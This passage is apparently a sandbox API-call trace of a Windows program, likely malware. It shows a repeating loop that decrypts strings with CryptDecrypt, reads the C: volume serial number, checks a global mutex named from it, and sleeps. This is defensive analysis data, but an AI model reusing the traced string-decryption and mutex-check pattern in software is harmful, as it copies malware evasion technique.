hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0135.121] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0135.121] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0135.121] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0135.121] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0135.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa2eb08) returned 1 [0135.121] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0135.121] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0135.122] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0135.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0135.122] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0135.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0135.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0135.122] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0135.122] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0135.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa2eb08) returned 1 [0135.122] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0135.122] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0135.122] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0135.122] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0135.122] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x138 [0135.122] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0x0) returned 0x102 [0135.122] CloseHandle (hObject=0x138) returned 1 [0135.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0135.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0135.122] Sleep (dwMilliseconds=0x3e8) [0136.134] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0136.134] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa2eb08) returned 1 [0136.134] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0136.134] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0136.134] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0136.134] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0136.134] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0136.134] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0136.134] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa2eb08) returned 1 [0136.134] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0136.134] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0136.134] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0136.134] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0136.134] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0136.134] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0136.134] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0136.134] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.135] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0136.135] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0136.135] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa2eb08) returned 1 [0136.135] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0136.135] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0136.135] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0136.135] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0136.135] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x138 [0136.135] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0x0) returned 0x102 [0136.135] CloseHandle (hObject=0x138) returned 1 [0136.135] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0136.135] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0136.135] Sleep (dwMilliseconds=0x3e8) [0137.147] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0137.147] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa2eb08) returned 1 [0137.147] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0137.148] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0137.148] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0137.148] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0137.148] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0137.148] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0137.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa2eb08) returned 1 [0137.148] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0137.148] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0137.148] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0137.148] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0137.148] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0137.148] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0137.148] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0137.148] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0137.148] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0137.148] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0137.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa2eb08) returned 1 [0137.148] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0137.148] CryptDecrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0137.148] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0137.148] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0137.148] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x138 [0137.148] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0x0) returned 0x102 [0137.148] CloseHandle (hObject=0x138) returned 1 [0137.148] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0137.148] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0137.149] Sleep (dwMilliseconds=0x3e8) [0138.558] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0138.558] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa2e850) returned 1 [0138.558] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0138.558] CryptDecrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0138.558] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.558] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0138.558] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0138.558] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0138.558] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa2e850) returned 1 [0138.558] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0138.558] CryptDecrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0138.558] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.558] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0138.558] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0138.558] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0138.558] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0138.558] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0138.558] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0138.558] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0138.558] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa2e850) returned 1 [0138.559] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0138.559] CryptDecrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0138.559] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.559] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0138.559] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x148 [0138.559] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x0) returned 0x102 [0138.559] CloseHandle (hObject=0x148) returned 1 [0138.559] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0138.559] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0138.559] Sleep (dwMilliseconds=0x3e8) [0139.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0139.568] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32828) returned 1 [0139.568] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0139.568] CryptDecrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0139.568] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0139.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0139.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0139.568] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32828) returned 1 [0139.568] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0139.568] CryptDecrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0139.568] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.568] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0139.568] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.568] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0139.568] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0139.568] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.568] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0139.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0139.569] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32828) returned 1 [0139.569] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0139.569] CryptDecrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0139.569] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.569] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0139.569] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x124 [0139.569] WaitForSingleObject (hHandle=0x124, dwMilliseconds=0x0) returned 0x102 [0139.569] CloseHandle (hObject=0x124) returned 1 [0139.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0139.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0139.569] Sleep (dwMilliseconds=0x3e8) [0140.580] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0140.580] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32da8) returned 1 [0140.580] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0140.580] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0140.580] CryptDestroyKey (hKey=0xa32da8) returned 1 [0140.580] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0140.580] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0140.580] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0140.580] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32da8) returned 1 [0140.580] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0140.580] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0140.580] CryptDestroyKey (hKey=0xa32da8) returned 1 [0140.580] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0140.580] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0140.580] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0140.580] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0140.580] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.580] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0140.580] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0140.580] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32da8) returned 1 [0140.580] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0140.580] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0140.580] CryptDestroyKey (hKey=0xa32da8) returned 1 [0140.580] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0140.580] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x190 [0140.580] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x0) returned 0x102 [0140.581] CloseHandle (hObject=0x190) returned 1 [0140.581] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0140.581] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0140.581] Sleep (dwMilliseconds=0x3e8) [0142.055] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0142.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32da8) returned 1 [0142.055] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0142.055] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0142.055] CryptDestroyKey (hKey=0xa32da8) returned 1 [0142.055] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0142.055] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0142.055] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0142.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32da8) returned 1 [0142.055] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0142.055] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0142.055] CryptDestroyKey (hKey=0xa32da8) returned 1 [0142.055] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0142.055] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0142.055] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0142.055] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0142.055] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.055] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0142.055] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0142.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32da8) returned 1 [0142.056] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0142.056] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0142.056] CryptDestroyKey (hKey=0xa32da8) returned 1 [0142.056] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0142.056] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x190 [0142.056] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x0) returned 0x102 [0142.056] CloseHandle (hObject=0x190) returned 1 [0142.056] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0142.056] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0142.056] Sleep (dwMilliseconds=0x3e8) [0143.884] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0143.884] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32968) returned 1 [0143.884] CryptSetKeyParam 